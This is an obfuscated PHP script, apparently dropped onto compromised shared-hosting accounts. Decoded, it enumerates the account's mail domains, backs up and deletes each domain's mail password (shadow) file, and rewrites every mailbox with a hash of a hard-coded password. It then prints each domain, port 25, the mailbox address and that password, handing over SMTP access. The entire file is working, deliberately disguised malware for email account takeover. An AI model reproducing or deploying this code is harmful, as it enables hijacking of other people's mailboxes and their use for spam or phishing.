<?php

goto vdd7G; WlnV3: $mGfjc = array(25, 587, 465, 110, 995, 143, 993); goto g3oRO; RdyAP: $T9RX0 = @explode("\x2f", getcwd())[1]; goto GcOTo; nFJJo: error_reporting(0); goto SiH4u; vdd7G: set_time_limit(0); goto nFJJo; g3oRO: $VoyX3 = get_current_user(); goto RdyAP; YylgN: n0Cyr: goto vqUn0; GcOTo: if (!$T9RX0) { goto GKWKG; } goto tpZzL; tpZzL: $Jed3N = "\x2f" . $T9RX0 . "\x2f" . $VoyX3 . "\57\x65\164\x63\57"; goto QSNbW; DsQ7j: foreach ($VKlA6 as $xHDiP) { goto qhvC3; S1_V4: @($d_Zl7 = file_get_contents("\57" . $T9RX0 . "\x2f" . $VoyX3 . "\57\x65\x74\x63\x2f" . $xHDiP . "\57\x73\x68\141\144\157\167")); goto RGS1L; qhvC3: if (!(strpos($xHDiP, "\56") == true)) { goto Hd7av; } goto uojt0; w28IK: $R1s8F = crypt($CGcFQ, "\x24\x36\x24\162\157\x6f\x74\164\x6e\x24"); goto S1_V4; pbHvT: $CGcFQ = "\150\x75\x6e\67\63\162\163\155\x74\160\x32\x32"; goto w28IK; RGS1L: $iVww_ = explode("\12", $d_Zl7); goto YJqZa; KglQG: Hd7av: goto SjXgO; YJqZa: @link("\57" . $T9RX0 . "\x2f" . $VoyX3 . "\57\145\x74\x63\x2f" . $xHDiP . "\57\163\150\x61\144\157\x77", "\57" . $T9RX0 . "\x2f" . $VoyX3 . "\x2f\145\164\143\x2f" . $xHDiP . "\57\163\x68\x61\144\157\x77\x2e\143\154\64\167\x2e\x62\141\x6b"); goto l4r7A; oo78p: foreach ($iVww_ as $okEFL) { goto KWI2x; V1Q3a: fwrite($kSfx6, $QIxku . "\72" . $R1s8F . "\72\x31\x36\62\x34\71\72\72\72\x3a\72" . "\12"); goto knr_3; knr_3: fclose($kSfx6); goto HGYqs; pUtFv: XVMZP: goto fW1d3; KWI2x: $QIxku = @explode("\x3a", $okEFL)[0]; goto TQQiY; TQQiY: if (!$QIxku) { goto N7Gfz; } goto RklTU; M9KCI: N7Gfz: goto pUtFv; HGYqs: echo "\55\55\55" . $xHDiP . "\174\x32\x35\174" . $QIxku . "\x40" . $xHDiP . "\x7c" . $CGcFQ . "\74\x62\x72\76"; goto M9KCI; RklTU: $kSfx6 = fopen("\57" . $T9RX0 . "\57" . $VoyX3 . "\x2f\145\164\x63\57" . $xHDiP . "\x2f\x73\150\141\144\157\x77", "\x61\142"); goto V1Q3a; fW1d3: } goto BaAIk; BaAIk: vS3RC: goto KglQG; SjXgO: QDCev: goto mgxuq; l4r7A: @unlink("\57" . $T9RX0 . "\x2f" . $VoyX3 . "\57\x65\x74\143\x2f" . $xHDiP . "\57\163\x68\141\x64\x6f\167"); goto oo78p; uojt0: echo "\x3c\163\164\x72\157\x6e\x67\76" . $xHDiP . "\x3c\57\163\x74\162\157\156\x67\x3e\74\x62\162\x3e"; goto pbHvT; mgxuq: } goto YylgN; FH3zg: ini_set("\x6d\x65\x6d\x6f\162\171\137\154\x69\x6d\151\164", -1); goto WlnV3; QSNbW: $VKlA6 = @array_diff(@scandir($Jed3N), array("\56\56", "\x2e")); goto DsQ7j; SiH4u: ini_set("\x6d\x61\x78\137\145\170\145\x63\165\x74\151\157\x6e\x5f\164\151\x6d\x65", 0); goto FH3zg; vqUn0: GKWKG:
